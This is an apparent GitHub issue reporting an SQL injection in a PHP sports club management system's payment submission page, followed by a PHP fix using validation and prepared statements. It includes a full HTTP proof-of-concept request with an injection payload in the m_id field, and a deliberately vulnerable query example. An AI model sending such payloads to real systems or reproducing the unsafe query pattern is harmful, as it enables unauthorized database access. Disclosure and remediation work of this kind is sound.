shreyansh225 / Sports-Club-Management-System

Developed an online Sports Club Management system for easy time scheduling, with a user-friendly interface that gives real-time information about members' details, payments, time scheduling and sport availability, using HTML, CSS, Bootstrap, PHP and the XAMPP server.

SQL injection vulnerability in Sports Club Management System #6

Closed huclilu closed 2 years ago

huclilu commented 2 years ago

Build environment: Apache 2.4.39; MySQL 5.5.29; PHP 5.6.9

SQL injection vulnerability in Sports Club Management System

In admin/make_payments.php, at line 119, the information entered by the user is submitted to submit_payments.php. Following the code, we can see that the m_id entered by the user is assigned to $memID. Without any filtering, it is inserted directly into the database query, and the query results are returned, causing an SQL injection vulnerability.

POC:

POST /dashboard/admin/submit_payments.php HTTP/1.1
Host: sportsvul.test
Content-Length: 213
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://sportsvul.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://sportsvul.test/dashboard/admin/make_payments.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ogqe8040ok4a08i16t97ng7734
Connection: close

m_id=1529336794' and (select 2*(if((select * from (select concat((select user())))s), 8446744073709551610, 8446744073709551610)))-- &u_name=Christiana+Mayberry&prevPlan=Football+Plan&plan=BOQKJB&submit=ADD+PAYMENT
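The fix for the pattern described in this report is to stop splicing `m_id` into the SQL text and instead validate it and bind it as a parameter. The following is an added example written for this issue page; it is not code from the Sports-Club-Management-System repository or from the reporter. The table name `tbl_members`, the column `member_id`, the function names and the connection placeholders are assumptions made for illustration, not identifiers taken from the project.

```php
<?php
// Added example (hypothetical names, not the project's code): the lookup that the
// issue describes, shown in the unsafe shape and in a parameterised shape.
declare(strict_types=1);

// Make mysqli raise exceptions instead of silently returning false on errors.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// The shape the issue describes: the raw request value becomes part of the SQL
// string, so anything after a closing quote is parsed as SQL. Kept here only as
// the "before" side of the comparison.
function lookupMemberUnsafe(mysqli $db, string $memID): ?array
{
    $sql = "SELECT * FROM tbl_members WHERE member_id = '$memID'"; // vulnerable
    $row = $db->query($sql)->fetch_assoc();
    return $row ?: null;
}

// Hardened form: validate the type first, then bind the value as a parameter so
// it is sent to MySQL separately from the statement text and can never change
// the statement's structure.
function lookupMemberSafe(mysqli $db, string $rawMemID): ?array
{
    // 1. A member id is a positive integer; reject anything else outright rather
    //    than trying to strip "bad" characters out of it.
    $memID = filter_var($rawMemID, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($memID === false) {
        return null;
    }

    // 2. Prepared statement with a typed placeholder ('i' = integer).
    $stmt = $db->prepare('SELECT * FROM tbl_members WHERE member_id = ?');
    $stmt->bind_param('i', $memID);
    $stmt->execute();
    // get_result() needs the mysqlnd driver (default in PHP 5.4+); on builds
    // without it, use bind_result()/fetch() instead.
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

// Usage in a request handler such as submit_payments.php (connection values are
// placeholders): the raw POST field is passed through the validating lookup and a
// rejected id produces a 400 instead of a database error.
$db = new mysqli('localhost', 'DB_USER_PLACEHOLDER', 'DB_PASS_PLACEHOLDER', 'DB_NAME_PLACEHOLDER');
$db->set_charset('utf8mb4');

$member = lookupMemberSafe($db, (string) ($_POST['m_id'] ?? ''));
if ($member === null) {
    http_response_code(400);
    exit('Invalid member id.');
}
// ... continue with $member['member_id'] for the payment insert, again via
// prepared statements for u_name, prevPlan and plan.
```

Two points for anyone applying this to the code base: the integer check on its own would already stop the payload shown in the PoC, but the prepared statement is what actually closes the vulnerability class, because it holds even when a field legitimately contains quotes (the `u_name` value, for instance). Every other request field written by submit_payments.php should be bound the same way, and `mysqli_report` with `MYSQLI_REPORT_STRICT` ensures a failed prepare or execute surfaces as an exception in logs rather than being swallowed, which is also what a detection rule for injection attempts against this endpoint should key on.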